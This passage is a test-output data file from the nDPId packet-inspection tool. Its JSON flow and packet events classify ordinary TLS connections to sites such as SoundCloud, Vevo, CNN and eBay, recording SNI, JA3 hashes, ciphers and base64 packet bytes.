-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1646482686914,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482686914,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8RWlAAEAGOjfAqAGA0FUonrNwAFCsdkxQAAAAAKAC+vAqmQAAAgQFtAQCCArNau1nAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1646482687080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482687080,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8\/\/dAAPAGz6fQVSiewKgBgABQs3Db1RKprHZMUaASOQif4AAAAgQFtAEDAwAEAggKWgQEFM1q7Wc="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":339,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482724450,"flow_last_seen":1646482724450,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482724450,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1646482724450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482724450,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8sa9AAEAG8DvAqAGAEkLEZspeAbv+oP0DAAAAAKAC+vBIlQAAAgQFtAQCCAqQpxNDAAAAAAEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1646482724458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482724458,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8e2QAAPYGsIYSQsRmwKgBgAG7yl4LcBoC\/qD9BKAS\/\/+NCwAAAgQFoAQCCAqOOgLQkKcTQwEDAwg="} -01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1646482724464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482724464,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5sbFAAEAG7jzAqAGAEkLEZspeAbv+oP0EC3AaA4AYAfbA9QAAAQEICpCnE1COOgLQFgMBAgABAAH8AwM6K+sImNx3dIej3yQBfsHlSQyH5l4F8hLKFYurrt+jPCCUv6qySiadEZg7Gj4\/vX5jrLg\/JYOIeoxWa\/ahTy7RDQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAATABEAAA5zb3VuZGNsb3VkLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACDq1odYnjLE9YoHd\/igeLWhv14ukLQSyf98ZPyHkQn7OgAXAEEEKYWpJR9uHJSJZBwzi1pAC8cLX9iNXc5VMFPlSgV8HHXqYbwegIwyfo36+y7oUVZIFeBilQuBs9gLF4NzHajtKwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482724450,"flow_last_seen":1646482724464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482724464,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"soundcloud.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00932{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":342,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482724450,"flow_last_seen":1646482724472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482724472,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.3","client_requested_server_name":"soundcloud.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482734324,"flow_last_seen":1646482734324,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482734324,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1646482734324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482734324,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8YZNAAEAGvz7AqAGAl2XAXNyUAbtdgP2MAAAAAKAC+vB5pwAAAgQFtAQCCArbJaT6AAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1646482734331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482734331,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGJ9KXZcBcwKgBgAG73JRRJl9LXYD9jaAS\/\/87kQAAAgQFTAQCCArq9J312yWk+gEDAwk="} -01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1646482734334,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482734334,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5YZVAAEAGvT\/AqAGAl2XAXNyUAbtdgP2NUSZfTIAYAfZOkQAAAQEICtslpQXq9J31FgMBAgABAAH8AwNzr2vzd\/QT\/aDhJiSq61v58duBBGwTUq6z8fAzWLEV5CDNfOfaUUVYVfXW\/CDKtRAJ+tVWWsbZK9mMfW2g+Km+ogAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAANAAsAAAh2ZXZvLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACCPQyH3d70yPXK9aVtEdAPnRA9ZC5WTB071dNPYc9Y+CAAXAEEEeVVr0wfghCvKk8pB3rwr9lMyYYYxB1YwkLSYt9F3bwDqNkUCdiLkyXAxOw3adrfDZNG4HFWPlbGmWIPel1Si6AArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482734324,"flow_last_seen":1646482734334,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482734334,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vevo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":346,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482734324,"flow_last_seen":1646482734350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482734350,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vevo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01479{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":348,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482734324,"flow_last_seen":1646482734350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4125,"flow_avg_l4_payload_len":687,"midstream":0,"thread_ts_msec":1646482734350,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vevo","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vevo.com","server_names":"*.cache.vevo.com,*.cache.vevodev.com,*.cache.vevoprd.com,*.cache.vevostg.com,*.vevodev.com,*.vevoprd.com,*.vevostg.com,stg.vevo.ly,vevo.com,vevo.ly,vevo.pl,vevo.tv,vevoapi.com,vevocdn.com,vevolive.tv,vevosubmit.com,www.vevo.ly,www.vevo.pl,*.vevo.com,*.vevo.ly,*.vevo.pl,*.vevo.tv,*.vevoapi.com,*.vevocdn.com,*.vevolive.tv,*.vevosubmit.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.cache.vevo.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"ED:55:58:0E:19:94:FE:95:93:86:88:FE:30:27:DF:43:EB:74:17:C2"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482753482,"flow_last_seen":1646482753482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482753482,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1646482753482,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482753482,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8SaBAAEAG1aPAqAGAFwFCT7wMAbtaGHg4AAAAAKAC+vA\/9AAAAgQFtAQCCAr10Gu5AAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1646482753504,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482753504,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGJkQXAUJPwKgBgAG7vAwZG5KKWhh4OaAS\/ogYMwAAAgQFtAQCCApuzQml9dBruQEDAwc="} -01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1646482753507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482753507,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5SaJAAEAG06TAqAGAFwFCT7wMAbtaGHg5GRuSi4AYAfZqJAAAAQEICvXQa9NuzQmlFgMBAgABAAH8AwOUyHhinsfe9G2IXNgY9L7xAzZ+DjB199btap4Cw89cViDuti6QLvXTxzS8GPAI\/LqrruRicKAVDOLPOdfZnGvHHQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAQAA4AAAtjZG4uY25uLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACCyATmKdF69bnRwMVBRd98tu612XdMkfb0+p4HzFN6fBwAXAEEE+SEvSVfUiTeIP8IKKsjphsMZuVwTWztloapho\/r89Lhgv68xO7BDbwW8nmN\/dVf8z\/v3pQVdFakWyi7cuNIpiwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482753482,"flow_last_seen":1646482753507,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482753507,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.cnn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":354,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482753482,"flow_last_seen":1646482753526,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482753526,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.cnn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482759960,"flow_last_seen":1646482759960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482759960,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1646482759960,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482759960,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8N8NAAEAGsY7AqAGAAhGNMZ+AAbsz0CpkAAAAAKAC+vAbqAAAAgQFtAQCCApTrIzgAAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1646482759979,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482759979,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgG8VECEY0xwKgBgAG7n4Axx0rTM9AqZaAS\/ogIXwAAAgQFtAQCCAq1xN1AU6yM4AEDAwc="} -01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1646482759982,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482759982,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5N8VAAEAGr4\/AqAGAAhGNMZ+AAbsz0CplMcdK1IAYAfb4fgAAAQEIClOsjPe1xN1AFgMBAgABAAH8AwO90p\/YrOJd\/Z4tss7jqktThIJxJIB3e+qrLLFobtKKlyAX6YhgDO5LSOYTxZN2IGu+QsQ1WdlQy7VgjD2lE+VvBgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAARAA8AAAx3d3cuZWJheS5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgf8Mv24G6SSqxNEfrqm7W\/bejLWA6OGSZmHTWefPpxiwAFwBBBD+GtRBdEP9fCUeld\/IGhJTQe0q9+sY1uU3D5mNCoqM6EROqE0XBEIsVt1XPe0XwL5d6JRvhBZsY2OXTwlPA9KoAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482759960,"flow_last_seen":1646482759982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482759982,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ebay.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":358,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482759960,"flow_last_seen":1646482760002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482760002,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.ebay.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482772264,"flow_last_seen":1646482772264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482772264,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1646482772264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482772264,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8SfdAAEAGtwnAqAGAuX2+FaeEAbviQ3M+AAAAAKAC+vAD2AAAAgQFtAQCCAo3btlLAAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1646482772292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482772292,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADcGCgG5fb4VwKgBgAG7p4RVAzgX4kNzP6AS\/ogvJwAAAgQFtAQCCAoh0SIcN27ZSwEDAwc="} -01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1646482772294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482772294,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5SflAAEAGtQrAqAGAuX2+FaeEAbviQ3M\/VQM4GIAYAfaY1QAAAQEICjdu2Woh0SIcFgMBAgABAAH8AwMB8bRCQdqcx9fui+mF7VjuHN5SBb79arjGU4qYGthMOSBbTABCg135wJeFEPl+a8Oxzav9AsC9J9+l+IIaNAxYkQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFhc3NldHMudWJ1bnR1LmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACCezVQBlUDf2SIx8m1xehLWY9pQKyvfH068Wwzre\/JcNwAXAEEEo09VNt2RkHEqlhHBw1nk6JbOlFIOJqgyxElu\/vwC+3XCJEwr43v+9rwXwcTyZXa+qtiIur9f6O0kVe2u0AJzEQArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA